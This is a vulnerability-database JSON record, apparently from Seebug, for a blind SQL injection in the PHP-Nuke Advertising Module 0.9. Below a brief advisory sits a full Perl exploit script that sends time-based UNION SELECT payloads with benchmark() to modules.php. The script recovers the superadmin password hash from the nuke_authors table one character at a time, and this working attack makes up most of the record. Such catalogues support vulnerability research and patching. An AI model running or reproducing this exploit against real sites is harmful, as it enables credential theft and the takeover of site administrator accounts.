DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2017-11-19T15:48:05", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "href": "https://www.seebug.org/vuldb/ssvid-84117", "references": [], "enchantments_done": [], "id": "SSV:84117", "title": "PHP-Nuke Advertising Module 0.9 Modules.PHP SQL Injection Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 21, "sourceData": "\n source: http://www.securityfocus.com/bid/26406/info\r\n\r\nThe PHP-Nuke Advertising Module is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.\r\n\r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. \r\n\r\n\r\n#!/usr/bin/perl\r\n#Product: PHP-Nuke Module Advertising\r\n#BugFounder: 0x90\r\n#HomePage: WwW.0x90.COM.Ar\r\n#Problem: Blind SQL Injection\r\n\r\n\r\n\r\nuse strict;\r\nuse warnings;\r\nuse LWP;\r\nuse Time::HiRes;\r\nuse IO::Socket;\r\n\r\n\r\nmy $host = "http://[url]/modules.php?name=Advertising";\r\n\r\nmy $useragent = LWP::UserAgent->new;\r\nmy $metodo = HTTP::Request->new(POST =$host);\r\n\r\nmy $post;\r\nmy $inicio;\r\nmy $risposta;\r\nmy $fine;\r\nmy $tiempodefault;\r\nmy $tiempo;\r\nmy $i;\r\nmy $j;\r\nmy $hash;\r\nmy @array;\r\n\r\n@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);\r\n\r\n\r\n$post="login=a&pass=a&op=client_valid";\r\n$tiempodefault=richiesta($post);\r\n$hash="";\r\n\r\n#QUERY RISULTANTE\r\n\r\n#SELECT * FROM nuke_banner_clients WHERE login='a' UNION SELECT\r\n0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`,\r\n1,1))=112),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE\r\n`radminsuper`=1/*\r\n\r\n\r\nfor ($i=1;$i<33;$i++)\r\n{\r\nfor ($j=0;$j<16;$j++)\r\n{\r\n $post="login=a' UNION SELECT 0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`," . $i\r\n. ",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM\r\nnuke_authors WHERE `radminsuper`=1/*&pass=a' UNION SELECT 0,0,0,0,0,0,\r\nIF((ASCII(SUBSTRING(`pwd`," . $i . ",1))=".\r\n$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE\r\n`radminsuper`=1/*&op=client_valid";\r\n $tiempo=richiesta($post);\r\n aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);\r\n if($tiempo>10)\r\n {\r\n $tiempo=richiesta($post);\r\n aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);\r\n if($tiempo>10)\r\n {\r\n $hash .=chr($array[$j]);\r\n aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);\r\n $j=200;\r\n }\r\n }\r\n\r\n\r\n}\r\nif($i==1)\r\n{\r\n if($hash eq "")\r\n {\r\n $i=200;\r\n print "El atake Fallo\\n";\r\n }\r\n}\r\n}\r\n\r\nprint "Atake Terminado\\n\\n";\r\n\r\nsystem("pause");\r\n\r\n\r\nsub richiesta{\r\n$post=$_[0];\r\n$metodo->content_type('application/x-www-form-urlencoded');\r\n $metodo->content($post);\r\n$inicio=Time::HiRes::time();\r\n$risposta=$useragent->request($metodo);\r\n$risposta->is_success or die "$host : ",$risposta->message,"\\n";\r\n$fine=Time::HiRes::time();\r\n$tiempo=$fine-$inicio;\r\nreturn $tiempo\r\n}\r\n\r\nsub aggiorna{\r\nsystem("cls");\r\n@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);\r\nprint "PHP-Nuke Module Advertising Blind SQL Injection\\n";\r\nprint "by 0x90\\n";\r\nprint "Visit: WwW.0x90.CoM.Ar\\n\\n";\r\nprint "Victima : " . $_[0] . "\\n";\r\nprint "Tiempo Default : " . $_[1] . " secondi\\n";\r\nprint "Hash Bruteforce : " . chr($array[$_[2]]) . "\\n";\r\nprint "Bruteforce n Caracter Hash : " . $_[5] . "\\n";\r\nprint "Tiempo sql : " . $_[4] . " secondi\\n";\r\nprint "Hash : " . $_[3] . "\\n";\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-84117", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645277935, "score": 1659785532, "epss": 1678850553}}

{}